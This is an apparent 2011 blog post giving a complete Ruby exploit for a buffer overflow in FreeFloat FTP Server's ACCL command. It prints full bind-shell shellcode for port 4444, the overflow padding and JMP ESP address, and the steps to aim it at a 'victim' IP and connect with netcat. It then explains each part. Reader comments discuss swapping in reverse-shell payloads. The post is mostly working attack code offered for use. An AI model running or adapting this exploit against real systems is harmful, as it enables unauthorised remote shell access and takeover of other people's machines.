Posted on Wednesday, 20th July 2011 by Michael
Ruby exploit for FreeFloat FTP Server ACCL Buffer OverFlow and remote Shell
The original vulnerability was published here: http://www.exploit-db.com/exploits/17550. The FreeFloat FTP server is a free standing executable FTP server requiring no installation on a computer system. The application itself is riddled with buffer overflows and is extremely simple to crash. Though the trick is not to make it to crash but to gain shell access, Mortis original published the working exploit in python. What we have done here is converted it into a ruby exploit. Why? Simply cause while learning ruby I took it as a challenge to test what I have learned.
Exploiting the vulnerability
To test the actual exploit download the vulnerable software and install it on a Windows XP SP3 machine: http://www.freefloat.com/software/freefloatftpserver.zip. Next on a Linux machine copy the ruby code provided and save it to a file called ftpexploit.rb and chmod it to 777. To run the exploit type in ./ftpexploit.rb and enter the victims IP. If the exploit is successful you will get a windows shell.
The Exploit
#!/usr/bin/ruby
#
#FreeLoat FTP SERVER ACCL BUFFER OVERFlow and remote shell Exploit
#Original Exploit by: Mortis as found on exploit-db.com
#Code redesigned into ruby by genxweb from digitaloffensive.com
###############################################################
###############################################################
require 'socket'
puts "Enter the IP to Exploit: "
h0st = gets
victim = h0st.chomp!
#open listener shell on port 4444
sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"
padding = "A"*246
sled = "\x90"*20
jmpesp = "\x13\x44\x87\x7c"
sploit = "#{padding}#{jmpesp}#{sled}#{sc}"
s = TCPsocket.new("#{victim}",21)
s.recv(1024)
s.puts("USER test\r\n")
s.recv(1024)
s.puts("PASS test\r\n")
s.recv(1024)
s.puts("ACCL "+sploit+"\r\n")
s.close()
puts "#### IF EXPLOIT IS SCUCCESSFUL SHELL WILL OPEN ####"
puts "###################################################"
system("nc #{victim} 4444")
How the code works
First we ask the hacker for the victims IP address. Once we have that we remove the trailing new line statement using the chomp command. Now that we have the victims IP we build the packet that will be sent over the socket we open.
The first part of the packet is the padding and sled. This gets us to the point where we can overwrite the memory with our shellcode. The jmpesp variable is the place in memory in big endian format to enter our shellcode. The shellcode is a generic shellcode to open port 4444 on the victim’s machine with a windows command line access.
Once the packet is built we open a connection to the victim on port 21, the standard ftp port. Once the connection is built we send the user: test and password: test. After that we then send the ACCL and exploit packet. If this is successful a shell will spawn on the victims box.
Finally the exploit will then use netcat (nc) to connect to the victims machine so you can interact with the victim.
Posted in Security Advisories | Comments (2)
July 20th, 2011 at 4:47 pm
Great work dude. Rather than opening up a shell and trying to netcat in (they might be firewalled), how can we easily make it so the shellcode is inter-changeable? What if there was a list of different shellcodes to insert? Kind of like metasploit/core impact but just with this one script.
July 20th, 2011 at 10:04 pm
John adding that functionality is just a matter of find the jmpesp where the app crashes on the arch in question then finding shellcode that will run in that space. Once I have time I am going to look at the metasploit shellcode to see if there is a reverse shell for windows 7 and test on that. I could also add the funtionality to grab the banner and only run the exploit if it is freefloat.